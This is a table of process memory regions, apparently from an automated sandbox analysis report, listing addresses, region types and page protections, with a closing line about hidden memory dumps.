||
4DCC000
|
trusted library allocation
|
page read and write
|
||
8610000
|
trusted library allocation
|
page read and write
|
||
639E000
|
stack
|
page read and write
|
||
6998000
|
heap
|
page read and write
|
||
3080000
|
heap
|
page read and write
|
||
DC0000
|
trusted library allocation
|
page read and write
|
||
798E000
|
stack
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
45C0000
|
heap
|
page readonly
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
7403000
|
heap
|
page read and write
|
||
340A000
|
trusted library allocation
|
page execute and read and write
|
||
74FD000
|
stack
|
page read and write
|
||
6A84000
|
heap
|
page read and write
|
||
716E000
|
stack
|
page read and write
|
||
33ED000
|
trusted library allocation
|
page execute and read and write
|
||
7890000
|
trusted library allocation
|
page read and write
|
||
4740000
|
heap
|
page read and write
|
||
70AF000
|
stack
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
31D5000
|
heap
|
page read and write
|
||
724A000
|
heap
|
page read and write
|
||
288A000
|
heap
|
page read and write
|
||
33F0000
|
trusted library allocation
|
page read and write
|
||
45F0000
|
trusted library allocation
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
2ECB000
|
heap
|
page read and write
|
||
780C000
|
heap
|
page read and write
|
||
7D20000
|
direct allocation
|
page read and write
|
||
8530000
|
trusted library allocation
|
page read and write
|
||
78B8000
|
heap
|
page read and write
|
||
64AC000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
4DA5000
|
trusted library allocation
|
page read and write
|
||
2E51000
|
heap
|
page read and write
|
||
AEC000
|
heap
|
page read and write
|
||
6A5B000
|
heap
|
page read and write
|
||
6534000
|
heap
|
page read and write
|
||
5763000
|
heap
|
page read and write
|
||
500E000
|
stack
|
page read and write
|
||
D9D000
|
trusted library allocation
|
page execute and read and write
|
||
5435000
|
heap
|
page read and write
|
||
7B9D000
|
stack
|
page read and write
|
||
3097000
|
heap
|
page read and write
|
||
8A40000
|
trusted library allocation
|
page execute and read and write
|
||
336D000
|
heap
|
page read and write
|
||
10DE000
|
stack
|
page read and write
|
||
6A8D000
|
heap
|
page read and write
|
||
874E000
|
stack
|
page read and write
|
||
7AA0000
|
trusted library allocation
|
page read and write
|
||
6C2C000
|
stack
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
59DB000
|
trusted library allocation
|
page read and write
|
||
6CBD000
|
stack
|
page read and write
|
||
68A0000
|
direct allocation
|
page read and write
|
||
3430000
|
trusted library allocation
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
68A2000
|
direct allocation
|
page read and write
|
||
8050000
|
trusted library allocation
|
page read and write
|
||
64B2000
|
heap
|
page read and write
|
||
12DA000
|
heap
|
page read and write
|
||
7ADE000
|
stack
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
513E000
|
stack
|
page read and write
|
||
7231000
|
heap
|
page read and write
|
||
8D5E000
|
stack
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
550B000
|
heap
|
page read and write
|
||
2E85000
|
heap
|
page read and write
|
||
6DE0000
|
heap
|
page read and write
|
||
65AE000
|
trusted library allocation
|
page read and write
|
||
74A0000
|
trusted library allocation
|
page read and write
|
||
6534000
|
heap
|
page read and write
|
||
87B0000
|
trusted library allocation
|
page read and write
|
||
2FFE000
|
unkown
|
page read and write
|
||
DEE000
|
stack
|
page read and write
|
||
2F18000
|
heap
|
page read and write
|
||
2E3F000
|
heap
|
page read and write
|
||
7202000
|
heap
|
page read and write
|
||
DD9000
|
stack
|
page read and write
|
||
2EC0000
|
heap
|
page read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
6584000
|
heap
|
page read and write
|
||
5518000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
2E7D000
|
stack
|
page read and write
|
||
2DB0000
|
heap
|
page read and write
|
||
33B6000
|
heap
|
page read and write
|
||
8820000
|
heap
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
58D9000
|
trusted library allocation
|
page read and write
|
||
56E9000
|
heap
|
page read and write
|
||
CDC000
|
stack
|
page read and write
|
||
88AA000
|
heap
|
page read and write
|
||
6563000
|
heap
|
page read and write
|
||
7050000
|
heap
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
C2D000
|
stack
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
77DC000
|
heap
|
page read and write
|
||
3290000
|
trusted library allocation
|
page read and write
|
||
DA0000
|
heap
|
page read and write
|
||
7828000
|
heap
|
page read and write
|
||
71F0000
|
heap
|
page read and write
|
||
7652000
|
trusted library allocation
|
page read and write
|
||
3301000
|
heap
|
page read and write
|
||
AA20000
|
trusted library section
|
page read and write
|
||
5F2F000
|
stack
|
page read and write
|
||
DFE000
|
stack
|
page read and write
|
||
477E000
|
stack
|
page read and write
|
||
4590000
|
trusted library allocation
|
page read and write
|
||
8750000
|
heap
|
page read and write
|
||
D90000
|
trusted library allocation
|
page read and write
|
||
33F9000
|
trusted library allocation
|
page read and write
|
||
583E000
|
heap
|
page read and write
|
||
798000
|
stack
|
page read and write
|
||
851E000
|
stack
|
page read and write
|
||
2E72000
|
heap
|
page read and write
|
||
33E0000
|
trusted library allocation
|
page read and write
|
||
73C6000
|
heap
|
page read and write
|
||
6521000
|
heap
|
page read and write
|
||
8540000
|
trusted library allocation
|
page read and write
|
||
ADD000
|
heap
|
page read and write
|
||
34F7000
|
heap
|
page read and write
|
||
2E99000
|
heap
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
4DF0000
|
trusted library allocation
|
page read and write
|
||
4CD0000
|
heap
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
316F000
|
stack
|
page read and write
|
||
8A61000
|
trusted library allocation
|
page read and write
|
||
47FE000
|
stack
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
6A0A000
|
heap
|
page read and write
|
||
4DBF000
|
heap
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
6583000
|
heap
|
page read and write
|
||
4564000
|
trusted library allocation
|
page read and write
|
||
859D000
|
stack
|
page read and write
|
||
28AD000
|
heap
|
page read and write
|
||
5746000
|
heap
|
page read and write
|
||
28B5000
|
heap
|
page read and write
|
||
B41000
|
heap
|
page read and write
|
||
5480000
|
heap
|
page read and write
|
||
2E6F000
|
heap
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
5461000
|
heap
|
page read and write
|
||
462E000
|
stack
|
page read and write
|
||
7833000
|
heap
|
page read and write
|
||
57C5000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
7C10000
|
trusted library allocation
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
6A5C000
|
heap
|
page read and write
|
||
71AE000
|
stack
|
page read and write
|
||
591E000
|
stack
|
page read and write
|
||
7A4D000
|
stack
|
page read and write
|
||
86A0000
|
heap
|
page read and write
|
||
8BC0000
|
trusted library allocation
|
page read and write
|
||
7A0E000
|
stack
|
page read and write
|
||
75C000
|
stack
|
page read and write
|
||
77E2000
|
heap
|
page read and write
|
||
75DD000
|
stack
|
page read and write
|
||
6910000
|
heap
|
page read and write
|
||
6A9D000
|
heap
|
page read and write
|
||
483E000
|
stack
|
page read and write
|
||
6FEE000
|
stack
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
65AA000
|
trusted library allocation
|
page read and write
|
||
26EC000
|
stack
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
886F000
|
heap
|
page read and write
|
||
33AD000
|
heap
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
712F000
|
stack
|
page read and write
|
||
CA0000
|
heap
|
page read and write
|
||
4E18000
|
heap
|
page read and write
|
||
2E65000
|
heap
|
page read and write
|
||
6A7C000
|
heap
|
page read and write
|
||
56E5000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
6521000
|
heap
|
page read and write
|
||
7856000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
84DE000
|
stack
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
571E000
|
heap
|
page read and write
|
||
77AE000
|
stack
|
page read and write
|
||
339B000
|
heap
|
page read and write
|
||
2E6F000
|
heap
|
page read and write
|
||
AC4000
|
heap
|
page read and write
|
||
77FE000
|
heap
|
page read and write
|
||
74AE000
|
stack
|
page read and write
|
||
699E000
|
heap
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
792D000
|
stack
|
page read and write
|
||
5060000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
50C0000
|
trusted library allocation
|
page read and write
|
||
575A000
|
heap
|
page read and write
|
||
6999000
|
heap
|
page read and write
|
||
6900000
|
heap
|
page read and write
|
||
FD8000
|
heap
|
page read and write
|
||
4C7E000
|
stack
|
page read and write
|
||
7410000
|
trusted library section
|
page read and write
|
||
1090000
|
heap
|
page read and write
|
||
77BE000
|
heap
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
3888000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
78C5000
|
heap
|
page read and write
|
||
665F000
|
trusted library allocation
|
page read and write
|
||
6A65000
|
heap
|
page read and write
|
||
3415000
|
trusted library allocation
|
page execute and read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
6A6E000
|
heap
|
page read and write
|
||
AB0000
|
heap
|
page read and write
|
||
2FF7000
|
heap
|
page read and write
|
||
33C7000
|
heap
|
page read and write
|
||
8885000
|
heap
|
page read and write
|
||
5839000
|
heap
|
page read and write
|
||
10016000
|
direct allocation
|
page execute and read and write
|
||
743D000
|
stack
|
page read and write
|
||
4FF9000
|
trusted library allocation
|
page read and write
|
||
503C000
|
stack
|
page read and write
|
||
6C29000
|
trusted library allocation
|
page read and write
|
||
56FA000
|
heap
|
page read and write
|
||
6AB7000
|
heap
|
page read and write
|
||
3331000
|
heap
|
page read and write
|
||
3400000
|
trusted library allocation
|
page read and write
|
||
6996000
|
heap
|
page read and write
|
||
3810000
|
heap
|
page read and write
|
||
6521000
|
heap
|
page read and write
|
||
64A1000
|
heap
|
page read and write
|
||
74BE000
|
stack
|
page read and write
|
||
D3F000
|
stack
|
page read and write
|
||
6A76000
|
heap
|
page read and write
|
||
729C000
|
stack
|
page read and write
|
||
5B5E000
|
stack
|
page read and write
|
||
2F21000
|
heap
|
page read and write
|
||
7040000
|
heap
|
page read and write
|
||
3ABA000
|
heap
|
page read and write
|
||
6584000
|
heap
|
page read and write
|
||
10FB000
|
stack
|
page read and write
|
||
1060000
|
heap
|
page read and write
|
||
8510000
|
trusted library allocation
|
page execute and read and write
|
||
71CF000
|
stack
|
page read and write
|
||
6A92000
|
heap
|
page read and write
|
||
4CFB000
|
trusted library allocation
|
page read and write
|
||
6513000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
34C0000
|
heap
|
page readonly
|
||
1160000
|
heap
|
page read and write
|
||
334E000
|
stack
|
page read and write
|
||
578B000
|
trusted library allocation
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
4BEE000
|
stack
|
page read and write
|
||
2EBC000
|
heap
|
page read and write
|
||
56EC000
|
heap
|
page read and write
|
||
752E000
|
stack
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
32F2000
|
heap
|
page read and write
|
||
572E000
|
heap
|
page read and write
|
||
B2B000
|
heap
|
page read and write
|
||
57C3000
|
heap
|
page read and write
|
||
5231000
|
trusted library allocation
|
page read and write
|
||
5762000
|
heap
|
page read and write
|
||
354E000
|
stack
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
4CDF000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
5088000
|
trusted library allocation
|
page read and write
|
||
5451000
|
heap
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
718E000
|
stack
|
page read and write
|
||
6A08000
|
heap
|
page read and write
|
||
68B2000
|
direct allocation
|
page read and write
|
||
5755000
|
heap
|
page read and write
|
||
757A000
|
stack
|
page read and write
|
||
D88000
|
stack
|
page read and write
|
||
7218000
|
heap
|
page read and write
|
||
69F4000
|
heap
|
page read and write
|
||
339F000
|
heap
|
page read and write
|
||
7946000
|
trusted library allocation
|
page read and write
|
||
8600000
|
trusted library allocation
|
page execute and read and write
|
||
6A4B000
|
heap
|
page read and write
|
||
4DF7000
|
heap
|
page read and write
|
||
54B9000
|
heap
|
page read and write
|
||
559F000
|
stack
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
6A6F000
|
heap
|
page read and write
|
||
4550000
|
trusted library allocation
|
page read and write
|
||
7FA000
|
heap
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
4E29000
|
heap
|
page read and write
|
||
71C0000
|
heap
|
page execute and read and write
|
||
B4E000
|
heap
|
page read and write
|
||
7310000
|
heap
|
page read and write
|
||
6B60000
|
trusted library allocation
|
page read and write
|
||
8060000
|
trusted library allocation
|
page read and write
|
||
4570000
|
trusted library allocation
|
page read and write
|
||
5713000
|
trusted library allocation
|
page read and write
|
||
6A4E000
|
heap
|
page read and write
|
||
46FC000
|
stack
|
page read and write
|
||
4DC4000
|
heap
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
2F16000
|
heap
|
page read and write
|
||
4CD0000
|
heap
|
page execute and read and write
|
||
29DA000
|
stack
|
page read and write
|
||
8FB000
|
stack
|
page read and write
|
||
655A000
|
heap
|
page read and write
|
||
698E000
|
heap
|
page read and write
|
||
4595000
|
trusted library allocation
|
page execute and read and write
|
||
7A7A000
|
trusted library allocation
|
page read and write
|
||
2F0D000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
5787000
|
trusted library allocation
|
page read and write
|
||
6AC1000
|
heap
|
page read and write
|
||
63D6000
|
trusted library allocation
|
page read and write
|
||
AE70000
|
trusted library allocation
|
page read and write
|
||
2F0D000
|
heap
|
page read and write
|
||
AD7000
|
stack
|
page read and write
|
||
747A000
|
stack
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
5446000
|
heap
|
page read and write
|
||
6553000
|
heap
|
page read and write
|
||
78A6000
|
heap
|
page read and write
|
||
64AD000
|
heap
|
page read and write
|
||
4680000
|
heap
|
page read and write
|
||
5589000
|
trusted library allocation
|
page read and write
|
||
6A54000
|
heap
|
page read and write
|
||
33A9000
|
heap
|
page read and write
|
||
32C2000
|
trusted library allocation
|
page read and write
|
||
3920000
|
heap
|
page read and write
|
||
6A00000
|
heap
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
32F1000
|
heap
|
page read and write
|
||
3293000
|
trusted library allocation
|
page execute and read and write
|
||
5508000
|
heap
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
33B5000
|
heap
|
page read and write
|
||
27BF000
|
stack
|
page read and write
|
||
2E75000
|
heap
|
page read and write
|
||
582E000
|
heap
|
page read and write
|
||
340E000
|
stack
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
7570000
|
trusted library allocation
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
72C1000
|
heap
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
78D6000
|
heap
|
page read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
AB9000
|
heap
|
page read and write
|
||
AF2000
|
stack
|
page read and write
|
||
4871000
|
trusted library allocation
|
page read and write
|
||
3385000
|
heap
|
page read and write
|
||
306F000
|
stack
|
page read and write
|
||
338E000
|
stack
|
page read and write
|
||
2E16000
|
heap
|
page read and write
|
||
BCE000
|
stack
|
page read and write
|
||
64A5000
|
heap
|
page read and write
|
||
45D0000
|
trusted library allocation
|
page execute and read and write
|
||
57C3000
|
heap
|
page read and write
|
||
7D4E000
|
direct allocation
|
page read and write
|
||
54B0000
|
heap
|
page read and write
|
||
4F31000
|
trusted library allocation
|
page read and write
|
||
2F0B000
|
heap
|
page read and write
|
||
63DC000
|
trusted library allocation
|
page read and write
|
||
73D3000
|
heap
|
page read and write
|
||
49C7000
|
trusted library allocation
|
page read and write
|
||
57E1000
|
heap
|
page read and write
|
||
2F6F000
|
stack
|
page read and write
|
||
32F8000
|
heap
|
page read and write
|
||
4D98000
|
heap
|
page read and write
|
||
6994000
|
heap
|
page read and write
|
||
71FB000
|
stack
|
page read and write
|
||
338E000
|
heap
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
7030000
|
heap
|
page read and write
|
||
6A97000
|
heap
|
page read and write
|
||
2B5F000
|
stack
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
2850000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
6A8B000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
5A5D000
|
stack
|
page read and write
|
||
7B10000
|
trusted library allocation
|
page read and write
|
||
287C000
|
heap
|
page read and write
|
||
2E65000
|
heap
|
page read and write
|
||
6A2E000
|
heap
|
page read and write
|
||
704F000
|
stack
|
page read and write
|
||
56FC000
|
heap
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
32C0000
|
trusted library allocation
|
page read and write
|
||
47BF000
|
stack
|
page read and write
|
||
ACB000
|
heap
|
page read and write
|
||
DC7000
|
trusted library allocation
|
page execute and read and write
|
||
2FCF000
|
stack
|
page read and write
|
||
6A08000
|
heap
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
766E000
|
stack
|
page read and write
|
||
78CF000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
2BBE000
|
stack
|
page read and write
|
||
2C6F000
|
stack
|
page read and write
|
||
83FC000
|
stack
|
page read and write
|
||
574B000
|
heap
|
page read and write
|
||
2DB5000
|
heap
|
page read and write
|
||
6A6B000
|
heap
|
page read and write
|
||
6581000
|
heap
|
page read and write
|
||
5C9E000
|
stack
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
4BF5000
|
heap
|
page execute and read and write
|
||
5719000
|
heap
|
page read and write
|
||
4520000
|
heap
|
page read and write
|
||
54C1000
|
heap
|
page read and write
|
||
810E000
|
stack
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
6AC1000
|
heap
|
page read and write
|
||
6AAC000
|
heap
|
page read and write
|
There are 1309 hidden memdumps, click here to show them.